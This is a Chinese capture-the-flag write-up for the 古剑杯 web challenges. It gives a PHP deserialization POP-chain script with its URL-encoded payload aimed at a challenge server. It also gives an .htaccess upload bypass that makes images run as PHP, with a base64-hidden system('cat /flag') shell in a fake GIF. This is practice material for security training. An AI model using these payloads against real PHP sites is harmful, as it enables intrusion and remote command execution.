【古剑杯】

[古剑山]unse方法一

考点:php反序列化、php伪协议

解题步骤:

打开题目界面

直接访问当前目录的test.php,没有返回结果,看到include函数,可以结合php伪协议读取出test.php的源码

解密后

Bash 复制代码
<?php  
    $test = "Hello world";

include "flag.php";


function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun { 
    private $a; 
    function __wakeup(){ 
        $temp = $this->a . 'ctf'; 
    } 
} 

class bfun { 
    private $items = array(); 
    public function __toString() { 
        $item = $this->items; 
        $str = $item['dd']->knife; 
        return 'what the good?'; 
    } 
} 

class cfun { 
    private $params = array(); 
    public function __get($key) {  
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}
a

然后根据上面的php代码,我们进行构造pop链

Bash 复制代码
<?php
class afun {
    private $a;

    function __construct($b){
        $this->a=$b;
    }
    function __wakeup(){
        $temp = $this->a . 'ctf';  //这里可以触发__toString()函数
    }
}

class bfun {
    private $items = array();
    function __construct($b){
        $this->items=$b;
    }
    public function __toString() {
        $item = $this->items;
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}

class cfun {
    private $params = array();
    function __construct($b){
        $this->params=$b;
    }
    public function __get($key) {
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp);
    }
}

$c=new cfun(array('knife'=>'flag'));
$b=new bfun(array('dd'=>$c));
$a=new afun($b);
//$c=new cfun();
echo urlencode(serialize($a));

payload如下

Bash 复制代码
O%3A4%3A%22afun%22%3A1%3A%7Bs%3A7%3A%22%00afun%00a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A11%3A%22%00bfun%00items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A12%3A%22%00cfun%00params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

执行即可获得flag

Bash 复制代码
http://39.108.66.86:38076/?yourcode=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A7%3A%22%00afun%00a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A11%3A%22%00bfun%00items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A12%3A%22%00cfun%00params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

[古剑山]unse 方法二

考点:php反序列化、php伪协议

解题步骤:

index.php

Java 复制代码
<?php
    include("./test.php");
    if(isset($_GET['fun'])){
        if(justafun($_GET['fun'])){
            include($_GET['fun']);
        }
    }else{
        unserialize($_GET['yourcode']);
    }
    highlight_file(__FILE__);
?>

伪协议读test.php

Java 复制代码
<?php  
    $test = "Hello world";

include "flag.php";

function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun { 
    private $a; 
    function __wakeup(){ 
        echo 1;
        $temp = $this->a . 'ctf'; 
    } 
} 

class bfun { 
    private $items = array(); 
    public function __toString() { 
        echo 2;
        $item = $this->items; 
        $str = $item['dd']->knife; 
        return 'what the good?'; 
    } 
} 

class cfun { 
    private $params = array(); 
    public function __get($key) {  
        echo 3;
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}

pop链读$flag

Java 复制代码
<?php  
class afun { 
    private $a; 
        function __construct($a){
            $this->a=$a;
        }
} 

class bfun { 
    private $items = array(); 
        function __construct($a){
            $this->items['dd']=$a;
        }
} 

class cfun { 
    private $params = array(); 
        function __construct(){
            $this->params['knife']='flag';
        }
}

$c=new cfun;
$b=new bfun($c);
$a=new afun($b);
echo urlencode(serialize($a));

?>

[古剑山]upload_2_shell

考点:文件上传.htaccess解析漏洞,exif_imagetype函数绕过

解题步骤:

参考:https://blog.csdn.net/m0_62879498/article/details/125122900

.htaccess在头部定义图片大小来绕过exif_imagetype函数(报错处有提示),然后过滤了<?也可以结合.htaccess base64编码绕过

PHP 复制代码
#define width 1000
#define height 1000 
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=./1.png"

1.png(GIF89a后面要加个12才能成功,为了匹配base64解码不乱吗)

Plain 复制代码
GIF89a12PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
相关推荐
WTT001117 分钟前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
黑客Jack4 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里5 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
Mitch3116 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King7 小时前
网络安全 - SQL Injection
sql·web安全·php
m0_748237058 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全
hwscom8 小时前
如何永久解决Apache Struts文件上传漏洞
java·服务器·struts·web安全·apache
网络安全(华哥)8 小时前
X-Forwarded-For注入漏洞
windows·安全·web安全
独行soc11 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍10基于文件操作的SQL注入(File-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw